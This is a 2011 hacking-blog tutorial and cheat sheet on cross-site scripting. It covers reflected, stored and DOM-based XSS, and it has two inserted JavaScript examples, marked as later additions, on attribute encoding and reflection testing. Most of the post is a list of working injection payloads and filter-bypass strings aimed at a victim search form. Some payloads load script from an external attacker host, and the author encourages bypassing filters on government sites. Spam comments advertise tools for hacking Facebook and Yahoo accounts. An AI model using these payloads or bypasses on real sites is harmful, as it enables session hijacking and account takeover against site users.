
Cross site scripting(XSS) Cheat Sheet - Readers Choice!! ~ Hacking Alert http://hackingalert.blogspot.fr/2011/12/cross-site-scripting-cheat-sheet...

Computer Tricks and Hacks. Hacking Software and much more ...

11:04 PM cracking, hacking, hacking tutorial, sql injection tool, xss attack
8 comments

Hello friends. These days I am on an XSS rampage. I recently posted an article on
XSS vulnerability in Babylon search. Since then I have had several requests from
readers to post a quick article on cross site scripting. This tutorial will be divided into
two parts. In the first part I will cover the basics of XSS and how the attack vector is
implemented. In the next tutorial we will discuss some techniques by which we can
prevent XSS attacks.

OWASP lists SQL injection and XSS as the two most common vulnerabilities in web
pages and web apps. We have covered SQL injection quite extensively, so I decided
to write on XSS.

Cross Site Scripting or XSS is a web application attack in which the attacker injects a
piece of malicious client-side script into a vulnerable web application or web page, so
that the site itself delivers the script to its other users and their browsers run it as if it
were the site's own code. Because the script runs inside the victim's session, the
attack can open several doors for the attacker, from session hijacking to performing
any action on the site that the victim is allowed to perform.

Reflected or Non-persistent XSS attack

This is the most common form of XSS. The attacker crafts a malicious payload and
sends it to the server in an HTTP request, either in a request parameter (usually the
URL query string) or through an HTML form submission. The server echoes the value
back into the response page without encoding it, and the victim's browser executes it.
The payload is not stored anywhere, so it has to be delivered to each victim separately,
typically as a crafted link. A simple reflected XSS payload looks like this:
<script>alert('xss');</script> (Embedded script)
<script src=http://hack.com/xss.js></script> (External script)

Consider this real-world example of reflected XSS in action:


XSS vulnerability in Babylon Search

Stored or Persistent XSS attack

This attack is more dangerous than reflected XSS. In a stored or persistent XSS
attack, the malicious script is saved on the target server, for example in a database,
and is served to every user who later views the page that displays it; no crafted link
and no click are needed. For example, consider a forum where the attacker posts a
message containing the script. Whenever another user views that message, the script
runs in the viewer's browser and carries out the attack.
The attacker can craft a cookie-stealing script of the form
<script>alert(document.cookie);</script>. The alert() only proves that the script can
read the cookie; a real attack sends document.cookie to a server the attacker controls
and uses the session cookie to hijack the victim's session. Cookies set with the
HttpOnly flag are not readable from script, which is why that flag belongs on session
cookies.

DOM based XSS attack


DOM or document object model based XSS attacks exploit the client-side script of the
page in which they reside, rather than a server-side reflection. The attacker tricks the
page's own JavaScript into writing attacker-controlled data into the document, where
the browser executes the JavaScript or HTML of the attacker's choice. Unlike the other
two forms, the vulnerable code is JavaScript that runs directly in the user's browser,
and the payload may never reach the server at all.
Consider the following piece of code:

var loc = document.location + '?gotoHomepage=1';
document.write('<a href="' + loc + '">Home</a>');

The value of document.location is attacker-controlled, since it comes from the URL the
victim was sent, and here it is written into the document without any filtering or
encoding. A URL of the form
http://site.com/index.html?<script>alert(document.cookie)</script>
can be crafted and sent to the victim, and whatever it contains is written directly into
the user's document. Two things to notice when testing this pattern: the injection
point is inside the href attribute, so in practice the payload must first close that
attribute (for example with "> ) before it can open a tag; and browsers may
percent-encode characters such as < and > in the URL they expose through
document.location, so whether this exact payload fires depends on the browser and
on whether the page decodes the value before writing it. Putting the payload after a #
is common, since the fragment is never sent to the server and a server-side filter
cannot see it.
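The same sink rebuilt as runnable JavaScript, as an added example that is not part of the original post. It puts the page's two lines into a function that returns the markup document.write would have produced, beside a version that encodes the URL for the attribute context it lands in. The attacker URL, the encodeForHtmlAttribute helper and the containsInjectedScript check are this example's own assumptions, chosen so that it runs in Node without a browser.

```javascript
// Added example, not code from the original post. The vulnerable pattern
// from the text, rebuilt as plain functions so it can be run in Node:
// document.write is replaced by returning the HTML string the browser
// would have parsed.

// Vulnerable: the attacker-controlled URL text goes straight into an href attribute.
function renderHomeLinkVulnerable(locationHref) {
  const loc = locationHref + '?gotoHomepage=1';
  return '<a href="' + loc + '">Home</a>';
}

// Hypothetical helper (assumption of this example): HTML attribute encoding.
// Every character that could end the quoted attribute value or start a tag is
// turned into a character reference, so the browser treats the whole value as text.
function encodeForHtmlAttribute(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: same output shape, but the untrusted part is encoded for the
// attribute context it is written into.
function renderHomeLinkSafe(locationHref) {
  const loc = locationHref + '?gotoHomepage=1';
  return '<a href="' + encodeForHtmlAttribute(loc) + '">Home</a>';
}

// Constructed attacker URL. The payload sits in the fragment, which the server
// never receives, and it starts with "> because the injection point is inside
// an attribute value, not in plain page text.
const ATTACK_URL = 'http://site.com/index.html#"><script>alert(document.cookie)</script>';

// Crude indicator used to show the difference: does a script tag appear in
// the generated markup as markup (rather than as encoded text)?
function containsInjectedScript(html) {
  return /<script[\s>]/i.test(html);
}

function demo() {
  const vulnerable = renderHomeLinkVulnerable(ATTACK_URL);
  const safe = renderHomeLinkSafe(ATTACK_URL);
  return {
    vulnerable,
    safe,
    vulnerableInjected: containsInjectedScript(vulnerable),  // true
    safeInjected: containsInjectedScript(safe),              // false
  };
}

console.log(demo());
```

Attribute encoding fixes this particular sink, and only this sink: it does not make an arbitrary untrusted URL safe to use as a link target (a javascript: URL survives encoding untouched), which is acceptable here only because the value written is the page's own http(s) location. A sink that wrote into a script block or into page text would need the encoding for that context instead.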

Complete Cheat Sheet on XSS:

<html><font color="Red"><b>Pwned</b></font></html>

<script>alert('xss')</script>

"><script>alert('xss')</script>

Bypassing Simple XSS Filtration Without Alteration:

Now notice that the filter in a case like the one above matches only a few strings,
while there are many ways and many strings with which a malicious request can be
injected.
If it only filters '<', '>' and '/', it leaves the attacker with a vast number of other
characters to inject code with.
So the question is: since '<' and '>' are filtered, how can we still inject JavaScript or
HTML?
The answer is that the filtered characters are only needed to open a new tag. If the
reflected value lands inside an existing <script> block, typically inside a string literal
such as var q = 'INPUT', the attacker only has to end that string with ' or " and the
rest of the input is executed as JavaScript. The original code that followed the string
must then be commented out with // or kept syntactically valid, otherwise the script
does not parse and nothing runs.

For instance, if the value lands in a single-quoted string:

');alert('xss');//

This will generate an alert box again on a vulnerable server.

Secondly, if it lands in a double-quoted string:

");alert('xss');//

This will also generate an alert box on a vulnerable server.
Note that // itself contains a '/', so against a filter that also strips '/' the comment
trick fails; in that case the trailing code is re-balanced instead, for example
');alert('xss');var x=' reopens a string so that the server's own closing quote still
matches.

Bypassing Advanced XSS Filtration:

Some webmasters filter a lot more than this, especially on important sites such as
gov and org sites.
It all depends on their pattern. If the filtering is done in JavaScript on the client side,
we can simply alter the page or the request and it is gone; the interesting case is
when the filtering is done on the server, in PHP, ASP or whatever generates the HTML.
Nothing is impossible; we first try to get as much information about the filter as we
can, by submitting variations of the input and watching what comes back.
Suppose a server checks only whether the input begins or ends with a known
malicious string, and rejects it if so. This too can be bypassed.

An example:

helloworld<script>alert('xss')</script>

The above input bypasses a filter that only checks the beginning of the string.


helloworld<script>alert('xss')</script>helloworld

This bypasses a filter that checks the beginning, the end, or both ends of the string.
This kind of filtering is not common, so the trick is of limited use.
Some webmasters also filter the word 'xss', so it is best to use some other message
in the alert.

<script>alert('hello world')</script>

This bypasses filtering on the message.

Now we will study some more advanced filter bypasses.

Some webmasters simply define a pattern matching the one form of cross-site
scripting payload that is most common, and block only that.

For this case, here is the full array of strings to inject in order to bypass the filter.
Each one is built for a different reflection context: plain page text, inside a
double-quoted attribute (the "> prefix closes it), inside an existing <script> block
(the </script> prefix closes it), or inside a JavaScript string (the ') and ") prefixes
close it). Which one works is decided by where the server puts your input, not by
the filter.

We will suppose we are injecting in a search form.

victim.com/search.php?query="><script>alert('hello world')</script>
victim.com/search.php?query="><script>alert("hello world")</script>
victim.com/search.php?query="><script>alert("hello world");</script>
victim.com/search.php?query="><script>alert(/hello world/);</script>
victim.com/search.php?query=//"><script>alert(/hello world/);</script>
victim.com/search.php?query=abc<script>alert(/hello world/);</script>
victim.com/search.php?query=abc"><script>alert(/hello world/);</script>
victim.com/search.php?query=abc"></script><script>alert(/hello world/);</script>
victim.com/search.php?query=abc//abc"></script><script>alert(/hello world/);</script>
victim.com/search.php?query=000"><script></script><script>alert(1337);</script>
victim.com/search.php?query=000abc</script><script>alert(/1337/);</script>
victim.com/search.php?query=--<script>"></script><script>alert(/1337/);</script>
victim.com/search.php?query=pwned<script>document.write('abc');</script>
victim.com/search.php?query=pwned</script><script>document.write(1337);</script>
victim.com/search.php?query=pwned');alert(1337);//
victim.com/search.php?query=pwned");alert(1337);//
victim.com/search.php?query=pwned");alert(/pwned/);//
victim.com/search.php?query=pwned//"></script><script>location.href='javascript:alert(/pwned/)';</script>
victim.com/search.php?query="><img src="javascript:alert('xss');">
victim.com/search.php?query="><script src='http://hack.com/xss.js'></script>

These are a few simple and advanced scripts that can be used to check for XSS
vulnerability. The last two depend on the environment: modern browsers do not
execute a javascript: URL in an img src, and the external script needs a host you
control. There are several automatic tools available as well, but I would recommend
that you first learn the manual method so that you clearly understand the attack
vector; later on you can switch to automatic tools. If you know any other XSS script
that is missing from this tutorial, add it in the comment box and I will update the
tutorial along with your name.
Special Thanks: str0ke, USMAN, tushy, Hackman, shubham, Fix
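The manual method, written out as an added example that is not part of the original post. Rather than firing the whole list above blind, a tester sends one unique canary wrapped around the characters XSS needs, then looks at where the response echoes it, in what HTML context, and which characters survived; that alone tells you which family in the list is worth trying. The canary, the context classifier, the payload-family mapping and the sample response body are all this example's own constructions.

```javascript
// Added example, not code from the original post. A canary-based reflection
// check: find every echo of the probe in a response, classify the HTML context
// it landed in, and record which special characters came back unencoded.
// The response body at the bottom is constructed; in practice it is fetched
// from the target.

const CANARY = 'zx9q';                     // unlikely to appear naturally
const SPECIALS = '"\'<>/';                 // the characters XSS payloads need
const PROBE = CANARY + SPECIALS + CANARY;  // canary on both sides of them

// Rough context classification from the text preceding the reflection:
//   script    - inside an open <script> element
//   attribute - inside a tag, within a quoted value that is not yet closed
//   tag       - inside a tag but not inside a quoted value
//   text      - ordinary HTML text
function classifyContext(before) {
  // a <script ...> with no </script> after it means we are still inside it
  if (before.search(/<script[^>]*>(?![\s\S]*<\/script>)/i) !== -1) return 'script';
  const lastLt = before.lastIndexOf('<');
  const lastGt = before.lastIndexOf('>');
  if (lastLt > lastGt) {
    const tagText = before.slice(lastLt);
    const dq = (tagText.match(/"/g) || []).length;
    const sq = (tagText.match(/'/g) || []).length;
    return (dq % 2 === 1 || sq % 2 === 1) ? 'attribute' : 'tag';
  }
  return 'text';
}

// One entry per reflection: its context and which probe characters survived.
function analyseReflection(body) {
  const hits = [];
  const re = new RegExp(CANARY + '([\\s\\S]*?)' + CANARY, 'g');
  let m;
  while ((m = re.exec(body)) !== null) {
    const survived = [...SPECIALS].filter((c) => m[1].includes(c));
    hits.push({ context: classifyContext(body.slice(0, m.index)), survived, raw: m[1] });
  }
  return hits;
}

// Map a hit to the family of payload from the list above that fits it, or
// null when the surviving characters are not enough for that context.
function likelyPayloadFamily(hit) {
  const has = (c) => hit.survived.includes(c);
  if (hit.context === 'text' && has('<') && has('>')) return '<script>alert(1)</script>';
  if (hit.context === 'attribute' && has('"') && has('<')) return '"><script>alert(1)</script>';
  if (hit.context === 'script' && has("'")) return "');alert(1);//";
  return null;
}

// Constructed sample response: the probe is echoed three times, in three
// contexts, with different server-side handling of each.
const SAMPLE_BODY = [
  '<html><body>',
  '<input name="query" value="' + PROBE + '">',            // attribute, nothing encoded
  '<p>Results for ' + PROBE.replace(/[<>]/g, '') + '</p>', // text, < and > stripped
  "<script>var last = '" + PROBE + "';</script>",          // JS string, nothing encoded
  '</body></html>',
].join('\n');

function demo() {
  return analyseReflection(SAMPLE_BODY)
    .map((h) => ({ context: h.context, survived: h.survived.join(''), payload: likelyPayloadFamily(h) }));
}

console.log(demo());
```

On the sample body the second echo is the instructive one: the server stripped < and > from the text-context reflection, so the bare <script> family is useless there, while the same input reaches an attribute and a script string untouched, which is exactly what the "> and ') families in the list are for. The classifier is deliberately rough (it does not handle comments, CDATA or event-handler attributes); the point is to look before guessing.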

DARKLORD!!


8 comments:

Anonymous December 12, 2011 at 4:00 PM


encoded scripts?
Reply

Prayanthem December 12, 2011 at 11:44 PM


Awesome that you made a tutorial about this!


I have a program that actually finds websites (using Google
dorks) that have XSS and SQL vulnerabilities, so it is easy to test
out these different methods.

Thank you for sharing, fine sir.


Reply

abhinav singh December 13, 2011 at 10:26 AM


thanks man.. :)
Reply

RaviTeja December 18, 2011 at 1:01 PM


Why don't you place ads??
Reply

abhinav singh December 18, 2011 at 1:27 PM


@RaviTeja I did place ads once.. but some cyber criminals of a
neighbouring country started making fraud clicks on them, due to
which my AdSense account got disabled :( .. but now I am planning
to start again.. I have some affiliate offers.
Reply

crackon June 7, 2013 at 11:26 AM


hack yahoo mail password free, click here
Reply

crackon June 7, 2013 at 11:30 AM


you must get a real facebook hacker here

http://hackxfbx.blogspot.in/

OR

do you want a real facebook hacker? please click here

hack your friend fb account software free download


Reply

crackon June 7, 2013 at 11:31 AM


hack yahoo mail password free, click here
Reply



Copyright 2011 Hacking Alert | Blog owned by Hackmeout Inc.

